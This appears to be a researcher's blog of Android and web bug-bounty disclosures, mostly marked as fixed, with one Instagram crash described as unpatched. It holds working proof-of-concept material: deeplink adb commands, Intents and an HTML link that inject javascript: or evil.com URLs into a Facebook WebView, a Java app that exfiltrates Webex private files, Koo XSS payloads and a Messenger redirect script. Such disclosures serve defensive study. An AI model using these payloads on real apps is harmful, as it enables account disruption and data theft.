Bypass Samsung Knox protection to read files stored in a secure folder | Android


Description: Samsung Knox is a defensive mobile security platform that is built into Samsung devices and enhances security in all directions through a combination of physical means and software systems, providing security protection from the hardware to the application layer.

I used the path and file structure to bypass Samsung Knox protection in an unauthorized manner and read the files stored in the secure folder, and received a $3750 reward from Samsung.

Severity: High | SVE-2020-18025

Access Twitter blue features using deeplink without a subscription.

Twitter recently launched Twitter Blue for Android users, allowing them to change the app icon and undo tweets at any time. Twitter for Android version 9.76.0-release.0 implemented several deeplinks for the Twitter subscription flow that perform direct actions, and some of those deeplinks are neither validated nor protected by custom permissions, regardless of whether the user has a subscription. It is therefore possible to use the change-icon, custom-navigation and early-access features without a subscription via the deeplinks below:

twitter://subscriptions/settings/extras
twitter://subscriptions/settings/early_access

The extras deeplink gives access to changing the icon and the custom navigation, and the early_access deeplink gives access to features such as undoing tweets with custom timing.

Steps To Reproduce:

Launch the deeplink below using adb to access the app icon change flow:

adb shell am start -d "twitter://subscriptions/settings/extras"

Launch the deeplink below using adb to access the undo tweet feature:

adb shell am start -d "twitter://subscriptions/settings/early_access"

Proof of concept:

Instagram vulnerability : Turn off all type of message requests using deeplink (Android)


Instagram vulnerability description:
Instagram for Android has a messaging tool in which users can change message controls to decide whether they want to receive messages from potential connections or other people on Facebook and Instagram.

Instagram’s Android app has implemented a deeplink “instagram://turn_off_message_requests” that can turn off all requests so the user won’t receive messages from anybody, and this deeplink executes headlessly so there is no UI after execution of the deeplink.

Thus, a malicious or rogue app could execute the turn-off-message-requests deeplink without holding any permission such as “FB_APP_COMMUNICATION”, and an attacker could disable all incoming messages for the Instagram user.


Repro steps :

Instagram android app version: 258.1.0.26.100

1. Go to Instagram for Android > Messages > Tools > Message controls

2. Set “deliver requests to” to “message requests”

3. Close the Instagram app

4. Launch the “instagram://turn_off_message_requests” deeplink (without quotes)

5. Open the Instagram app and go to message controls; all options have become “Don’t receive”.

POC:

Timeline:

29/10/2022: Report submitted.

02/11/2022: Triaged

09/11/2022: Bounty

20/12/2022: Fixed

Follow me on Twitter :
https://twitter.com/RahulKankrale

Facebook android vulnerability: Launching internal/tighten deeplink onbehalf of user

In Facebook for Android, the ad creation deeplink “ads_lwi_coupon_interstitial” has the parameter “landing_page”, and the URI passed to this parameter was not validated, so any internal/tightened deeplink passed to it could be launched when the “Get Started” button was pressed in the UI.

Vulnerable deeplink:

fb://ads_lwi_coupon_interstitial/?ad_account_id=1&page_id=&landing_page=fbinternal://rninternalsettings&entry_point=home

Mobile app version: 342.0.0.37.119

Reproduction steps:

  1. Create an intent from a third-party app or HTML page with the deeplink “fb://ads_lwi_coupon_interstitial/?ad_account_id=1&page_id=216662095206780&landing_page=fbinternal://rninternalsettings&entry_point=home”
  2. Launch the deeplink/app
  3. Click on “Get Started”
  4. It will open the internal settings.

Proof of concept:

Timeline:

31/10/2021: Reported
03/11/2021: Triaged
06/12/2021: Fixed
02/02/2022: Reward $3000 + $225 (Silver Bonus) + $300 (delay bonus)

Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary website 

Facebook android webview vulnerability:

In Facebook for Android, the activity “com.facebook.katana.activity.iap.LaunchFromIAP” is exported with an intent filter for the action “com.facebook.katana.activity.iap” and passes the “CHECKOUTURL” Intent extra to loadUrl without validating the http/https scheme. This could have been used to send a malicious URL to the WebView and execute XSS, as well as to create a phishing web page.


Vulnerable Facebook app version: 338.1.0.36.118

Static code analysis:
In LaunchFromIAP, the WebView URL is loaded from the bundle “A0I”, which is defined in “p000X.C172877z9” as:

public static Bundle A0I(Activity activity) {
return activity.getIntent().getExtras();
}

So the LaunchFromIAP activity takes the Intent extras as the bundle “A0I”, reads the value via A0I.getString(“CHECKOUTURL”), stores it as the string “A02” and passes it to the WebView defined in “p000X.C44470KuZ”.


Reproduction:

This issue could be exploited in multiple ways:

1. Using any web browser:

<html>
<body>
    <a href="intent:#Intent;action=com.facebook.katana.activity.iap;S.CHECKOUTURL=javascript:alert(8);end">Click here
    </a>
</body>
</html>


2. Using a third-party app:

2.1: Using the action com.facebook.katana.activity.iap

Intent intent = new Intent("com.facebook.katana.activity.iap");
intent.putExtra("CHECKOUTURL", "https://evil.com");
startActivity(intent);

2.2: Using the exported activity

Intent intent = new Intent();
intent.setClassName("com.facebook.work", "com.facebook.katana.activity.iap.LaunchFromIAP");
intent.putExtra("CHECKOUTURL", "javascript:alert(9)");
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);

Proof of concept (POC) :


Timeline:

01/10/2021: Report submitted.

01/10/2021: Triaged.

07/10/2021: Bounty -> $1000 + $75 (Silver league Bonus)
Comment by Facebook:
“An untrusted Intent containing a Javascript: URL can cause XSS in LaunchFromIAP. The instance of this bug occurs due to not checking if the scheme is http(s). The larger root cause is that SecureWebView should not by-default handle javascript: URLs in loadURL.”

03/11/2021: Fixed in v342 (it now validates the http/https scheme, the host facebook.com and the path “/aas/iap_web”)

04/01/2022: Requested disclosure and Facebook agreed to disclosure
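As an added example (not Facebook's code), a hypothetical validator that applies the checks named in the fix note above, http/https scheme, host facebook.com and path /aas/iap_web, to the CHECKOUTURL extra before it can reach loadUrl(); the class and method names are assumptions.

```java
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;

// Hypothetical validator for the CHECKOUTURL Intent extra (added example, not Facebook's code).
public final class CheckoutUrlValidator {
    // Host and path taken from the fix note; the class and method names are assumptions.
    private static final String EXPECTED_HOST = "facebook.com";
    private static final String EXPECTED_PATH = "/aas/iap_web";

    // True only for an http(s) URL on the expected host and path; javascript:, file:,
    // intent: and every other scheme is rejected before it can reach loadUrl().
    public static boolean isAllowed(String checkoutUrl) {
        if (checkoutUrl == null || checkoutUrl.isEmpty()) return false;
        Uri uri = Uri.parse(checkoutUrl);
        String scheme = uri.getScheme();
        if (!"https".equalsIgnoreCase(scheme) && !"http".equalsIgnoreCase(scheme)) return false;
        // Exact host match: "facebook.com.evil.example" must not pass, and neither must
        // "facebook.com@evil.example" (android.net.Uri drops user-info, so getHost() is evil.example).
        String host = uri.getHost();
        if (host == null || !EXPECTED_HOST.equalsIgnoreCase(host)) return false;
        return EXPECTED_PATH.equals(uri.getPath());
    }
}

// Sketch of how an activity like LaunchFromIAP would apply the check (hypothetical).
class CheckoutActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        String url = getIntent().getStringExtra("CHECKOUTURL");
        if (!CheckoutUrlValidator.isAllowed(url)) {
            finish(); // refuse untrusted input instead of loading it
            return;
        }
        WebView webView = new WebView(this);
        setContentView(webView);
        webView.loadUrl(url);
    }
}
```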

[IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty



Facebook’s Linked Publications (Authorship or Author Tag) feature was designed to give journalists more credit and visibility for the articles they write, regardless of where they are published. It produced the byline seen in many posts, as well as the ability to easily follow that journalist and see when they share new articles publicly.


Cisco Webex Teams Mobile (Android) Information Disclosure Vulnerability


A vulnerability in the Cisco Webex Teams Mobile (Android) application could allow a local attacker to access non-sensitive information of an authenticated Webex Teams Mobile user.

The vulnerability is due to improper access handling in the affected software. An attacker could exploit this vulnerability by leveraging the improper access handling through a third-party application on an affected device. A successful exploit could allow the attacker to share non-sensitive information to any Webex Space the authenticated Webex Teams Mobile (Android) user has access to.

Affected Version: This vulnerability affected Cisco Webex Teams Mobile (Android) releases earlier than Release 41.5.1.

The Cisco PSIRT has assigned this bug the following CVSS version 3.1 score. The Base CVSS score as of the time of evaluation is 3.3

Acknowledgement by Cisco:

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx83611

Vulnerability Description: 

The Webex Teams app exports the activity com.webex.teams.crosslaunch.message, which is associated with the sharing fragment used to share content with a space or a one-to-one conversation, driven by parameters and actions such as android.intent.extra.STREAM and android.intent.action.SEND.

So any third-party app could use those parameters to trigger content sharing, because the app failed to validate the path and file (and the caller's permission to it) before sharing.

Step to reproduce:

  • Create android app using below code snippet:
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;
public class MainActivity extends AppCompatActivity {
  @Override
  protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
    StrictMode.setVmPolicy(builder.build());
    Uri uri = Uri.parse("file:///data/data/com.cisco.wx2.android/shared_prefs/com.cisco.wx2.android_preferences.xml");
    Intent intent = new Intent("android.intent.action.SEND");
    intent.setClassName("com.cisco.wx2.android", "com.webex.teams.crosslaunch.message");
    intent.putExtra("android.intent.extra.STREAM", uri);
    intent.setType("");
    startActivity(intent);
  }
}
  • Once created, run this app on a device where Webex Teams is installed.
  • Running the app opens the Webex Teams messaging window to select a target; select a target user, and the app attaches com.cisco.wx2.android_preferences.xml to be sent.
  • Click the send button: it sends the attached internal file to the target user. The same method gives access to data/data/com.cisco.wx2.android/*, so all files in the app's data directory, including databases, could be stolen.
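As an added example (not Webex code), a hypothetical guard for an exported SEND/share activity that refuses the file:// URI used in the steps above and any content URI served by the app's own provider; the class names and the provider authority are placeholders.

```java
import android.app.Activity;
import android.content.ContentResolver;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import java.util.Collections;
import java.util.Set;

// Hypothetical guard for an exported share activity (added example, not Webex code).
public final class ShareStreamGuard {
    // Authorities this app itself exposes (e.g. its FileProvider); placeholder value.
    private static final Set<String> OWN_AUTHORITIES =
            Collections.singleton("com.example.app.fileprovider");

    // True only for a content:// URI served by another app's provider.
    public static boolean isAcceptableStream(Uri uri) {
        if (uri == null) return false;
        // file:// (the scheme used in the steps above) and every other non-content scheme is
        // rejected outright, so a caller can no longer point the share flow at /data/data/<pkg>/ files.
        if (!ContentResolver.SCHEME_CONTENT.equals(uri.getScheme())) return false;
        String authority = uri.getAuthority();
        // A content URI on our own provider would still let a caller read our private files through us.
        if (authority == null || authority.isEmpty() || OWN_AUTHORITIES.contains(authority)) return false;
        return true;
    }

    // Returns the validated EXTRA_STREAM from an incoming SEND Intent, or null to refuse the share.
    public static Uri acceptedStream(Intent intent) {
        if (intent == null || !Intent.ACTION_SEND.equals(intent.getAction())) return null;
        Uri uri = intent.getParcelableExtra(Intent.EXTRA_STREAM);
        return isAcceptableStream(uri) ? uri : null;
    }
}

// Sketch of the receiving activity: refuse before any target-selection UI is shown.
class ShareReceiverActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri stream = ShareStreamGuard.acceptedStream(getIntent());
        if (stream == null) {
            finish();
            return;
        }
        // continue with the normal target-selection flow using `stream` only
    }
}
```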

Proof of Concept:
Download Video : https://drive.google.com/file/d/1SXElqWb9aFdUEuqjxilRsNCv5PB1mIDv/view?usp=sharing


Note: This vulnerability requires the user to be logged into the Teams app, and only non-sensitive information (some app and OS settings, and cached images) can be shared to other Webex spaces. All sensitive information is encrypted, so no CVE was assigned.

Crash Instagram Bug (Android) using U+043E (Unpatched)


Instagram for Android does not handle some Cyrillic letters such as U+043E (CYRILLIC SMALL LETTER O), so a hostname built with the Cyrillic small letter о, like the one below, can crash Instagram:

http://gооgle.com/

Copy the URL above and post it in an Instagram profile or send it to a user in chat.

To try it, go to my Instagram profile at https://instagram.com/rahulkankrale

and click on google.com.

Instagram crashes with the following exception:


Video for proof of concept:

Using this bug, a malicious user could crash an Instagram Live by sending this URL to the host.

I didn’t report this, as it has no security impact because of the user interaction required.

Koo App Vulnerability : Stored XSS (Cloudflare bypass)


XSS vulnerability found in the Koo app: Koo is a Bengaluru-based microblogging mobile application with 5 million users, known as an Indian alternative to Twitter. The Koo app allows users to connect, engage and interact in 13 regional languages such as Bengali, Telugu, Punjabi, Kannada and Hindi, among several others. The application was an instant hit because of its vast language options: the untapped user base in India that is not English-speaking, or wants a platform in its local language, has a lot of potential.

Description: Stored XSS, also known as persistent XSS is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.

Steps To Reproduce Koo App XSS:

1. Go to https://kooapp.com and log in

2. Then create a koo containing the URL-encoded XSS payload: %3Csvg%20onx%3D%28%29%20onload%3D%28confirm%29%28JSON.stringify%28localStorage%29%29%3E

3. Post the koo

Now the XSS is triggered for anybody who visits this koo.

POC:

Another endpoint was also vulnerable:

Reflected XSS in the hashtag feature:

https://www.kooapp.com/tag/n%3C%2ftitle%3E%3Csvg%20onx%3D%28%29%20onload%3D%28confirm%29%28%2FXSS_By_RahulKankrale%2F%29%3E

Both issues have been resolved.

Note: It is still vulnerable to HTML injection.

Facebook Messenger for android indirect thread deletion vulnerability.


Description:

Facebook Messenger for Android reuses the thread ID when invoked via a deeplink, which could let an attacker cause an indirect thread deletion.

This can lead to some confusing behaviour on the user-side, one example being: The user has a 1:1 with the attacker. The attacker then forces the user to create a new Group Chat with the same Thread ID that is not functional. If the user deletes the chat, the original chat with the attacker also disappears.

So an attacker could use this method to delete a thread between the victim and their friend, as well as delete chats from the victim's Messenger, because the victim cannot leave the duplicate group thread and is left with only the option to delete the conversation.

Deeplink used: fb-messenger://groupthreadfbid/%s

For automatic redirection using a webpage:

Repro steps :

Messenger App version (Android) : 274.0.0.18.120

Create a webpage with the following script (replace the user ID with your own user ID) and host it:

<script>function trigger(){document.location="fb-messenger://groupthreadfbid/100000505765955";}setTimeout(trigger, 1000);</script>

1. Send the link to the crafted webpage to a user with whom you previously interacted.

2. On the victim's phone, clicking that link opens a blank page and redirects back to the thread.

3. Send a message to the victim, or wait for the victim to close and reopen the app; a duplicate thread with the same ID is created between you and the victim on the victim's phone.

4. Now if the victim sends a message, it shows in both threads.

5. The victim opens the duplicate (group) thread, taps Members and then Admin, and sees “No admin”.

6. If the victim tries to leave that group, they get an error, so the only option left is to delete the duplicate (group) thread.

7. Once the victim deletes the duplicate thread via “delete conversation”, the original thread is also deleted; this deletion is permanent, as the thread is no longer visible on the web afterwards.

Timeline:

27/07/2020: Report submitted.

29/07/2020: FB managed to reproduce.

03/08/2020: Triaged

03/09/2020: Fixed

10/09/2020: Bounty

POC:
